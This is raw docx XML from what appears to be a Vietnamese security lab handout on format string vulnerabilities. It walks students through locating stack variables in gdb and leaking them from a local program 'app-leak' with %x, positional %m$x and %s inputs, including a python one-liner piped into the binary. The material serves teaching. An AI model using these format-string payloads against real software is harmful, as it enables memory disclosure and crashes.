                <w:rFonts w:ascii="UVN Viet Sach" w:hAnsi="UVN Viet Sach"/>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
            <w:r w:rsidR="007C7C23" w:rsidRPr="007C7C23">
              <w:rPr>
                <w:rFonts w:ascii="UVN Viet Sach" w:hAnsi="UVN Viet Sach"/>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve"> ký tự.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="36EEC6EF" w14:textId="77777777" w:rsidR="007C7C23" w:rsidRDefault="007C7C23" w:rsidP="001520CB">
      <w:pPr>
        <w:pStyle w:val="Content"/>
      </w:pPr>
      <w:r>
        <w:t>Gợi ý:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D1A4F3A" w14:textId="7AC39ADB" w:rsidR="00A52F9D" w:rsidRDefault="00A52F9D" w:rsidP="007C7C23">
      <w:pPr>
        <w:pStyle w:val="Content"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:ind w:left="709" w:hanging="283"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Các ví dụ trên đọc được các giá trị tại các ô nhớ gần vùng tham số của printf thứ 2, vậy giá trị </w:t>
      </w:r>
      <w:r w:rsidR="000C0D45">
        <w:t>biến c</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> trong stack của main nằm ở đâu so với vùng tham số này?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189D085B" w14:textId="0DFD21EE" w:rsidR="0008202C" w:rsidRDefault="00685E20" w:rsidP="0008202C">
      <w:pPr>
        <w:pStyle w:val="Content"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Việc xác định vị trí của ô nhớ trong stack muốn đọc dữ liệu so với vùng tham số giúp xác định chuỗi định dạng cần sử dụng, ví dụ số lượng %x cần để đọc được đúng ô nhớ. Bước này xác định </w:t>
      </w:r>
      <w:r w:rsidR="003767C6">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>vùng nhớ cần đọc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> sẽ tương ứng vị trí tham số thứ mấy của printf.</w:t>
      </w:r>
      <w:r w:rsidR="0008202C">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E9FBD01" w14:textId="418DF651" w:rsidR="00685E20" w:rsidRDefault="00685E20" w:rsidP="00685E20">
      <w:pPr>
        <w:pStyle w:val="Content"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Mở </w:t>
      </w:r>
      <w:r w:rsidR="0008202C" w:rsidRPr="00650037">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>app</w:t>
      </w:r>
      <w:r w:rsidRPr="00650037">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>-leak</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> với gdb, xem mã assembly có thể thấy </w:t>
      </w:r>
      <w:r w:rsidR="00244888">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">biến c nằm ở vị trí ebp-14, debug ta được địa chỉ cụ thể là </w:t>
      </w:r>
      <w:r w:rsidR="00244888" w:rsidRPr="00244888">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>0xffff</w:t>
      </w:r>
      <w:r w:rsidR="001D5E1C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>d1a4</w:t>
      </w:r>
      <w:r w:rsidR="00244888">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34298097" w14:textId="17E7AFA2" w:rsidR="00257831" w:rsidRDefault="001D5E1C" w:rsidP="001D5E1C">
      <w:pPr>
        <w:pStyle w:val="Content"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2E499605" wp14:editId="65FEF0C4">
            <wp:extent cx="4253422" cy="2374605"/>
            <wp:effectExtent l="0" t="0" r="0"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2"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4295565" cy="2398132"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CCE6A78" w14:textId="5D26B4C2" w:rsidR="00D411F4" w:rsidRDefault="00685E20" w:rsidP="00685E20">
      <w:pPr>
        <w:pStyle w:val="Content"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Tiếp đến, xem vị trí đặt các tham số của hàm printf thứ 2. Ta thấy tham số đầu tiên, tức là địa chỉ chuỗi định dạng được đặt ở địa chỉ </w:t>
      </w:r>
      <w:r w:rsidRPr="00244888">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>0x</w:t>
      </w:r>
      <w:r w:rsidR="00244888" w:rsidRPr="00244888">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ffff</w:t>
      </w:r>
      <w:r w:rsidR="00C728FE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>d130</w:t>
      </w:r>
      <w:r w:rsidR="00244888">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DEC5568" w14:textId="7DBC62A1" w:rsidR="00D411F4" w:rsidRDefault="00C728FE" w:rsidP="00D411F4">
      <w:pPr>
        <w:pStyle w:val="Content"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F20A962" wp14:editId="7F9F9E23">
            <wp:extent cx="4422605" cy="219739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3"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4443181" cy="2207618"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6122B02B" w14:textId="5320BD83" w:rsidR="00685E20" w:rsidRDefault="00685E20" w:rsidP="00685E20">
      <w:pPr>
        <w:pStyle w:val="Content"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Ta xem các giá trị đang lưu gần địa chỉ </w:t>
      </w:r>
      <w:bookmarkStart w:id="10" w:name="_Hlk117860019"/>
      <w:r w:rsidR="005707EF" w:rsidRPr="00244888">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>0xffff</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
      <w:r w:rsidR="0055145B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>d130</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00B52AE9">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> Vùng màu xanh là các biến a, b</w:t>
      </w:r>
      <w:r w:rsidR="006F7F48">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00B52AE9">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>c.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6301273F" w14:textId="3DAC93FB" w:rsidR="00D411F4" w:rsidRPr="00D411F4" w:rsidRDefault="00105FD3" w:rsidP="00D411F4">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ind w:left="142" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>pwndbg</w:t>
      </w:r>
      <w:r w:rsidR="00D411F4" w:rsidRPr="00747EB0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>$</w:t>
      </w:r>
      <w:r w:rsidR="00D411F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D411F4">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">x/40wx </w:t>
      </w:r>
      <w:r w:rsidR="00D411F4" w:rsidRPr="00D411F4">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>0xffff</w:t>
      </w:r>
      <w:r w:rsidR="001C29B7">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>d130</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A5ACD88" w14:textId="6D3721F7" w:rsidR="00244888" w:rsidRDefault="00061EA1" w:rsidP="00D411F4">
      <w:pPr>
        <w:pStyle w:val="Content"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="771F013B" wp14:editId="598F1467">
            <wp:extent cx="4229166" cy="1375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4654" cy="1386683"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD170A8" w14:textId="680A7897" w:rsidR="00287DAA" w:rsidRDefault="00287DAA" w:rsidP="00287DAA">
      <w:pPr>
        <w:pStyle w:val="Content"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Từ vị trí đóng khung màu đỏ là tham số thứ nhất của printf, vốn cần 1 chuỗi định dạng, các khối dữ liệu </w:t>
      </w:r>
      <w:r w:rsidRPr="0072332F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>phía sau</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00070483">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">nó </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>sẽ lần lượt được đọc theo các ký hiệu. Ví dụ, 1 ký hiệu %x sẽ đọc 4 byte dữ liệu</w:t>
      </w:r>
      <w:r w:rsidR="00BC14B5">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> từ các ô nhớ phía sau</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00070483">
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Như vậy, để đọc được đến dữ liệu tại khung màu xanh, cần bao nhiêu ký hiệu %x?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B827F02" w14:textId="3C163CEA" w:rsidR="00AF4145" w:rsidRDefault="00AF4145" w:rsidP="00287DAA">
      <w:pPr>
        <w:pStyle w:val="Content"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Ví dụ </w:t>
      </w:r>
      <w:r w:rsidR="006F7F48">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">truyền chuỗi </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>định dạng:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="786AE545" w14:textId="3FE8D00C" w:rsidR="00AF4145" w:rsidRPr="00AF4145" w:rsidRDefault="006F7F48" w:rsidP="00AF4145">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ind w:left="142" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F7F48">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:r w:rsidR="00AF4145" w:rsidRPr="006F7F48">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>python -c</w:t>
      </w:r>
      <w:r w:rsidR="00AF4145" w:rsidRPr="00AF4145">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 'print(</w:t>
      </w:r>
      <w:r w:rsidR="00AF4145" w:rsidRPr="00F87E2F">
        <w:rPr>
          <w:rStyle w:val="s"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidR="00AF4145" w:rsidRPr="00AF4145">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>%x</w:t>
      </w:r>
      <w:r w:rsidR="00013754">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00AF4145" w:rsidRPr="00F87E2F">
        <w:rPr>
          <w:rStyle w:val="s"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidR="00AF4145" w:rsidRPr="00AF4145">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r w:rsidR="00AF4145" w:rsidRPr="00AF4145">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>k</w:t>
      </w:r>
      <w:r w:rsidR="00AF4145" w:rsidRPr="00AF4145">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>)' | ./app-leak</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC5D7EE" w14:textId="6F8FE1FC" w:rsidR="00B17427" w:rsidRDefault="00611994" w:rsidP="00B17427">
      <w:pPr>
        <w:pStyle w:val="Content"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7DDD6BFE" wp14:editId="6D548BED">
            <wp:extent cx="6057900" cy="403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403225"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A04C79" w14:textId="6E66590E" w:rsidR="00685E20" w:rsidRDefault="00685E20" w:rsidP="00685E20">
      <w:pPr>
        <w:pStyle w:val="Content"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:ind w:left="709" w:hanging="283"/>
      </w:pPr>
      <w:r w:rsidRPr="001520CB">
        <w:t xml:space="preserve">Cần lưu ý rằng phương pháp </w:t>
      </w:r>
      <w:r w:rsidR="00070483">
        <w:t>dùng</w:t>
      </w:r>
      <w:r w:rsidR="005B2EB3">
        <w:t xml:space="preserve"> nhiều</w:t>
      </w:r>
      <w:r w:rsidR="00070483">
        <w:t xml:space="preserve"> %x</w:t>
      </w:r>
      <w:r w:rsidRPr="001520CB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000B24B8">
        <w:t xml:space="preserve">sẽ </w:t>
      </w:r>
      <w:r w:rsidR="000F3F7E">
        <w:t>đọc hết</w:t>
      </w:r>
      <w:r w:rsidRPr="001520CB">
        <w:t xml:space="preserve"> lần lượt </w:t>
      </w:r>
      <w:r w:rsidR="00CA59DF">
        <w:t>dữ liệu t</w:t>
      </w:r>
      <w:r w:rsidRPr="001520CB">
        <w:t xml:space="preserve">rong </w:t>
      </w:r>
      <w:r w:rsidR="00CA59DF">
        <w:t>stack dưới dạng tham số của printf</w:t>
      </w:r>
      <w:r w:rsidRPr="001520CB">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Làm thế nào để trực tiếp lấy giá trị tại 1 vị trí trong stack </w:t>
      </w:r>
      <w:r w:rsidR="006B1532">
        <w:t xml:space="preserve">hay 1 tham số </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">mà không cần in hết các </w:t>
      </w:r>
      <w:r w:rsidR="006B1532">
        <w:t>giá trị trước đó?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3342F3BB" w14:textId="7B3DB122" w:rsidR="00685E20" w:rsidRDefault="00685E20" w:rsidP="00B17427">
      <w:pPr>
        <w:pStyle w:val="Content"/>
        <w:ind w:left="426" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sinh viên có thể sử dụng </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4898">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>%</w:t>
      </w:r>
      <w:r w:rsidR="00BB4898" w:rsidRPr="00BB4898">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>m</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4898">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>$x</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BB4898">
        <w:t xml:space="preserve">hoặc </w:t>
      </w:r>
      <w:r w:rsidR="00BB4898" w:rsidRPr="00BB4898">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>%</w:t>
      </w:r>
      <w:r w:rsidR="00BB4898" w:rsidRPr="00BB4898">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>m</w:t>
      </w:r>
      <w:r w:rsidR="00BB4898" w:rsidRPr="00BB4898">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>$d</w:t>
      </w:r>
      <w:r w:rsidR="00BB4898">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">để đọc tham số thứ </w:t>
      </w:r>
      <w:r w:rsidR="00BB4898">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>m</w:t>
      </w:r>
      <w:r w:rsidRPr="00D83020">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>+1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> của printf.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57166B98" w14:textId="20B2CEED" w:rsidR="00B17427" w:rsidRDefault="00611994" w:rsidP="00B17427">
      <w:pPr>
        <w:pStyle w:val="Content"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="06B90D34" wp14:editId="57DD55B7">
            <wp:extent cx="4136007" cy="92148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rotWithShape="1">
                    <a:blip r:embed="rId26"/>
                    <a:srcRect t="23073"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4242259" cy="945162"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C6DFB2" w14:textId="21418F7B" w:rsidR="002B6F19" w:rsidRPr="002B6F19" w:rsidRDefault="002B6F19" w:rsidP="002B6F19">
      <w:pPr>
        <w:pStyle w:val="Content"/>
        <w:ind w:left="426" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B6F19">
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>So sánh giá trị k và m ở 2 cách này?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429CDE90" w14:textId="02DD690E" w:rsidR="00326CA4" w:rsidRDefault="009C6D81" w:rsidP="00B07CC0">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Đọc</w:t>
      </w:r>
      <w:r w:rsidR="00326CA4" w:rsidRPr="00D34C02">
        <w:t xml:space="preserve"> chuỗi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> trong</w:t>
      </w:r>
      <w:r w:rsidR="00326CA4" w:rsidRPr="00D34C02">
        <w:t xml:space="preserve"> ngăn xếp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0313EC9F" w14:textId="4547F608" w:rsidR="00B07CC0" w:rsidRDefault="00B07CC0" w:rsidP="00B07CC0">
      <w:pPr>
        <w:pStyle w:val="Content"/>
      </w:pPr>
      <w:r>
        <w:t>Format %x ở trên sẽ in các giá trị dưới dạng hexan. Ngoài ra, còn có format %s có thể giúp in ra các chuỗi ký tự đến khi gặp ký tự NULL. Tham số dành cho %s là địa chỉ của vùng nhớ đang chứa chuỗi cần in. Phần này sẽ dùng %s để in chuỗi trong stack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B6741C" w14:textId="321BE5F5" w:rsidR="00B07CC0" w:rsidRPr="00B07CC0" w:rsidRDefault="00B07CC0" w:rsidP="00C540F8">
      <w:pPr>
        <w:pStyle w:val="Step"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Chạy chương trình và nhập chuỗi %s</w:t>
      </w:r>
      <w:r w:rsidR="002B6F19">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>%s</w:t>
      </w:r>
      <w:r w:rsidR="00611994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>%s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB2272D" w14:textId="31510DE3" w:rsidR="00B07CC0" w:rsidRDefault="00B07CC0" w:rsidP="00B07CC0">
      <w:pPr>
        <w:pStyle w:val="Content"/>
      </w:pPr>
      <w:r>
        <w:t>Quan sát kết quả bên dưới.</w:t>
      </w:r>
      <w:r w:rsidR="00BD0B98">
        <w:t xml:space="preserve"> Chương trình gặp lỗi Segmentation fault.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B1BAA9" w14:textId="33C87ED2" w:rsidR="002B6F19" w:rsidRDefault="00611994" w:rsidP="002B6F19">
      <w:pPr>
        <w:pStyle w:val="Content"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2DB61DC0" wp14:editId="4E972035">
            <wp:extent cx="3612412" cy="88833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2670" cy="903153"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
